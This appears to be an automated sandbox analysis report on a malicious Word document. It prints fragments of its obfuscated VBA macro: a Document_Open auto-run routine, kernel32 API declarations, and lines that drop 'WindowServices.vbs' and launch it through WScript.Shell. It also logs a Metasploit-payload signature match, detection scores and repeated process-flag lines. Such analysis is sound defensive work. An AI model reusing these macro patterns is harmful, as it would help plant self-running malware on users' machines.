Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 0dsIoO7xjt.docxOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: CallByName kakensooe, methodName, VbMethod
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Microsoft Office drops suspicious files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\WindowServices.vbsJump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Sub Document_Open()
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 0dsIoO7xjt.docxOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\up[1].txt, type: DROPPEDMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engineClassification label: mal100.expl.evad.winDOCX@4/10@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$sIoO7xjt.docJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{4A6D8404-AFEC-48A7-90EC-796F1AFDFB6D} - OProcSessId.datJump to behavior
Source: 0dsIoO7xjt.docxOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: 0dsIoO7xjt.docxOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 0dsIoO7xjt.docxVirustotal: Detection: 50%
Source: 0dsIoO7xjt.docxReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

Data Obfuscation

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: 0dsIoO7xjt.docxStream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
